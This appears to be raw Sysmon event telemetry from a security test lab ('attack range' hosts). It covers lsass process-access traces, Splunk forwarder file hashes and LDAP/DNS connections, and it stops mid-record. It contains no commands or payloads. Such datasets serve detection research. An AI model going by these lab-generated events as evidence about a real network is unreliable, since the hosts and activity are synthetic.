11:08:52.612{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:52.612{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:52.612{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:52.065{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DEDFD9F244BE06AE46E6F897ED60264,SHA256=16C54DC082C91931F27BF53DD4E1DF8C1C5AB6B25760C8DC498D04BF765A049E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220055Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:52.237{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAEA88A43A6C19F8F4F510E3F0349A25,SHA256=19236575299174F854E5F79055BDD61E53D4156332448F689BFE118B72C7FACE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220058Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:53.862{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8148F48E9D00287F9E4957B6859E15A6,SHA256=E4DD0F9466822215B6DCF664F5EF76ED24955729621A26B70848E3B4C2836787,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:52.085{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49290-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:52.085{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49290-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:51.252{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60830- 354300x8000000000000000295900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:51.251{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local62388-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000295899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:51.251{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54101- 354300x8000000000000000295898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:51.251{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54101-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000295897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:51.204{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49289-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000295896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:51.204{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49289-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 10341000x8000000000000000295895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:53.626{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:53.626{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:53.448{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:53.447{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:53.447{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:53.080{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=048F5D943A29401C9420EA5C68022D64,SHA256=D3B8BB33C0B2D50029A4559ECD08BE689C4143D4B14E92C15A4B9A848D1056A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220059Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:54.863{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60832CAB185CD39600D297FA395FDCDF,SHA256=AFFAB796ED86479AB576DA7EA474F46D317014E88419EE44992BFCAFC50B353F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:52.916{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49291-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:52.916{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49291-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000295904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:54.095{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71241B18A6C27F95CDEEE54A45D5D3D4,SHA256=EA1202D3EEEFED0D91901E8077AE3D0F5CDDE64C752B31C2458CB1809D3AEC25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220060Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:55.894{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCBE410D4B62651CA48CC45207F04A9A,SHA256=E3050DDCAE7EEEA63C9E15DE8D350EF8DD2862410FFD426FE9B9A97BCD9B64B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:55.096{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96BBB581065B27E2A0B86070A3C080B1,SHA256=0E0F53ED7272AD7FF3641A15DC4BE894E33E1A2CC24723E9020C780B61195913,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220061Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:56.925{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E181B3399F6864DC2D73EA732F9ECC2C,SHA256=867F3B1C816D905BD9CCF82CA3E990DF9E54B53B1C4BE1313522888CC85232B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:56.112{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2796403F861C8A6BEED278F00B3A0A8B,SHA256=11B00F72F6BFB3A9239A70FA353B2F270A21CC391054C9AD8A65AE97F8935C69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:57.148{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FEC81F87E439C744F686C2B9B7FB544,SHA256=809BF40BC4A04D6942FDA8F19F7A2E61718D4B71AAE876D7A6F929ED7BE3E2DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220062Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:58.050{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE0B5F00DCBFD0833D45B5762289C0B3,SHA256=CF16C10226950A2F7AD642B59D28B046CFEC3DF75748ED0D8DE64008F1F6B5DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:56.671{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49292-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:58.181{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2936599DC915FC48FC6461A520370728,SHA256=0EDA505DE811E85C77686528FEA4993070BA94916C92AA0CE04D6A83D45F7261,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:59.182{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E46751E6752DDC125D21A230570B2CA,SHA256=FCD1A690B9CACEE4F13C49C0DCEDEAFA68553CA4E8DFFFBEB7DCABE777428844,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220064Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:56.546{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51555-false10.0.1.12-8000- 23542300x8000000000000000220063Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:59.066{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA02432655032F2A082DA712B722901B,SHA256=789FDA8BC026936523D28639717EFCA4FB8304ECEA0023AC7A155CD7456D738A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:00.196{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DD7A370FF2594CF4E8C7FA32EE78BBB,SHA256=7375870CA42FE880032D9A32805DE57D20434DD72FEBEA6C7FD3C0E99F4CBB80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220065Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:00.081{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF1FFACE2829F72EE91F99245E6E9C5F,SHA256=43178A8D9406618FCA050EC8B36120DDD46847B4615063147C4A5EE6CF1991D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:01.550{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-15CD-6216-DD06-000000003802}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:01.548{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:01.546{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:01.548{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-15CD-6216-DD06-000000003802}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 